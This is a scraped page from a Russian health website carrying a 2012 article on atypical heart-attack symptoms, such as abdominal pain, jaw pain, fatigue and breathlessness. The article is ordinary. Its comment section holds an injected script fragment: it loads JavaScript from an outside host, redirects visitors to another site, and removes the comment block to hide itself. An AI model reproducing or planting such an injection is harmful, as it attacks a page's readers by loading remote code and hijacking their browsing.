Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Необычные симптомы инфарк...  >>  Необычные симптомы инфаркта
 
Обратная связь
 

Необычные симптомы инфаркта

Размер шрифта
17 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Классическим симптомом инфаркта миокарда является интенсивная боль за грудиной, которая длится более 15 минут и не проходит после приема нитроглицерина. Однако существуют и другие симптомы, при которых следует заподозрить инфаркт миокарда.

1. Тошнота и боль в животе

Если у человека появляется тошнота и боль в животе, то он первым делом думает о проблемах с желудочно-кишечным трактом. С этим трудно поспорить и, тем не менее, не следует забывать, что такие симптомы встречаются при инфаркте миокарда, особенно у людей старше 60 лет. Такая форма инфаркта миокарда носит название абдоминальной.

2. Боль в области ушей, челюсти, шее или плече

Как говорилось выше, для инфаркта миокарда характерна боль за грудиной, но в некоторых случаях боль возникает в челюсти, ушах, шее или плече. Иногда боль проходит, а потом начинается снова, что сбивает с толку не только пациентов, но даже врачей.

3. Усталость

Еще один необычный симптом инфаркта миокарда – это сильная усталость, которая сохраняется в течение нескольких дней. Некоторые женщины испытывают сильную усталость за несколько недель или месяцев до инфаркта миокарда.

4. Одышка и головокружение

Одним из симптомов инфаркта миокарда может быть нарастающая одышка, которая напоминает приступ бронхиальной астмы, – это так называемая астматическая форма инфаркта.

Также существует церебральная форма инфаркта, при которой наблюдается головокружение и нарушение сознания.

5. Бессонница и тревога

У некоторых людей за несколько недель или месяцев до инфаркта миокарда появляется необъяснимая тревога или трудности с засыпанием. Однако если пациент страдает бессонницей на протяжении длительного времени, этот симптом не позволит выявить заболевание.

6. «Не в своей тарелке»

У людей старческого возраста при наличии деменции или сочетанной патологии инфаркт миокарда может быть похож на многие другие заболевания. Однако родственники и близкие люди отмечают, что за несколько дней до инфаркта или в начале заболевания пациент находился как будто не в своей тарелке.

7Гриппоподобные симптомы

Если у человека появляется головная боль и слабость, он думает, что заболевает гриппом. Однако в некоторых случаях подобные симптомы могут свидетельствовать об инфаркте миокарда.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Больное сердце: скрытые признаки   Иди ты в баню! Это больше не ругательство!   Шум самолетов вызывает болезни сердца   Болезни-террористы. Инфаркт  
23 апреля 2013Выпали зубы – у вас болезнь сердца! 19 марта 2013Аспирин спасает от старческого слабоумия
 
24 февраля 2012Смерть «по часам» 24 февраля 2012Здоровое сердце после инфаркта
 

Слайдшоу

1
Наглядное руководство по заболеваниям сердца
3 органа-мишени в новом году
Вся правда об аритмии

Тесты

Грозит ли вам инфаркт миокарда?
Будет ли у вас инфаркт?
Сколько вы проживете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.